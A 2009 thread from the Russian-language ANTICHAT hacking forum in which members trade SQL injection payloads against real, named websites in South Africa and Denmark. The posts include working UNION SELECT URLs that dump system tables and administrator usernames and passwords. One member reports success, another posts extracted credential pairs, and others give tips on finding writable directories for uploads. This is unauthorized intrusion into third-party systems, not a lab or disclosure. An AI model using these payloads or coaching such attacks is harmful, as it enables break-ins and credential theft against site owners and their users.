ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 13.11.2009, 21:53
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами: 8803961

Репутация: 8
По умолчанию

На этом сайте есть таблица user

http://www.pcci.org.za/default.asp?id=946

Microsoft JET Database Engine error '80040e14'

Syntax error in string in query expression 'id = 946''.

/default.asp, line 128


http://www.pcci.org.za/default.asp?id=946+order+by+2
http://www.pcci.org.za/default.asp?id=946+union+select+1,2

http://www.pcci.org.za/default.asp?id=-946+union+select+*+from+msysobjects+in+'.'






Microsoft JET Database Engine error '80004005'

The Microsoft Jet database engine cannot open the file 'c:\windows\system32\inetsrv'. It is already opened exclusively by another user, or you need permission to view its data.

/default.asp, line 128




Но вывести нечего не удаеться.

Поскажите, как правилбно составить запрос.
 
Ответить с цитированием

  #2  
Старый 13.11.2009, 20:25
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
С нами: 9454841

Репутация: 504


По умолчанию

Цитата:
Сообщение от apekoff  
вот как получается правильный путь - но записи нету ,почему?
может прав нету, не?
ищи папку, где будут права на запись, либо попробуй другим способом
 
Ответить с цитированием

  #3  
Старый 13.11.2009, 21:18
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами: 10339586

Репутация: 1396


По умолчанию

apekoff, на тебе диру под запись:
Цитата:
/home/virtual/site3/fst/var/www/html/docs/
гугл всемогущий...или брюс. Похрен впрочем. Лейся.
 
Ответить с цитированием

  #4  
Старый 13.11.2009, 21:43
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами: 9555536

Репутация: 95
По умолчанию

парни, вот уже наверное за 2 дня десятую скули раскрутил,нашел админку,но пассворд не подходит, вот пример:
http://www.kamal.dk/fokusligenu.php?id=-227+UNION+SELECT+1,2,3,concat(username,0x20,userpa ssword),5,6,7,8,9,10,11,12+from+users--
http://www.kamal.dk/admin

но опять ничего не подошло, посмотрите плиз)
 
Ответить с цитированием

  #5  
Старый 13.11.2009, 21:46
wolmer
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
С нами: 8947056

Репутация: 229
По умолчанию

Цитата:
но опять ничего не подошло, посмотрите плиз)
Стоит basic авторизация (т.е. возможно одна пара логин/пароль вписанны в php файл для авторизации через basic (имхо многие так админы делают))

Возможно таблица юзеров от чего то другого
 
Ответить с цитированием

  #6  
Старый 13.11.2009, 21:50
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами: 9555536

Репутация: 95
По умолчанию

wolmer, я смотрю умные админы пошли) 10 сайтов, 10 разных стран...странно)
 
Ответить с цитированием

  #7  
Старый 13.11.2009, 21:58
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию

FlaktW,

http://www.pcci.org.za/default.asp?id=-1+union+select+null,name+from+msysobjects+where+MS ysObjects.Type=6

id=-1+union+select+username,password+from+ADMINISTRATO RS

Последний раз редактировалось ElteRUS; 13.11.2009 в 22:02..
 
Ответить с цитированием

  #8  
Старый 13.11.2009, 22:25
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами: 8803961

Репутация: 8
По умолчанию

Цитата:
Сообщение от ElteRUS  
FlaktW,

http://www.pcci.org.za/default.asp?id=-1+union+select+null,name+from+msysobjects+where+MS ysObjects.Type=6

id=-1+union+select+username,password+from+ADMINISTRATO RS




Thanks, все получилось.
 
Ответить с цитированием

  #9  
Старый 13.11.2009, 22:39
fng
Новичок
Регистрация: 12.11.2009
Сообщений: 20
С нами: 8681832

Репутация: 0
По умолчанию

Возник такой вопрос. Можно с помощью SQL injection внедрить запросы типа INSERT и DELETE? Для MySQL.

Последний раз редактировалось fng; 13.11.2009 в 22:46..
 
Ответить с цитированием

  #10  
Старый 13.11.2009, 22:20
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами: 9555536

Репутация: 95
По умолчанию

ElteRUS, смотри, www.pcci.org.za/admin - админка
есть три пары:
admin;admin
admi;admin
manager;manager
правильно?
Но опять же, в админку не попасть)

Последний раз редактировалось jecka3000; 13.11.2009 в 22:22..
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 7 (пользователей: 0 , гостей: 7)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.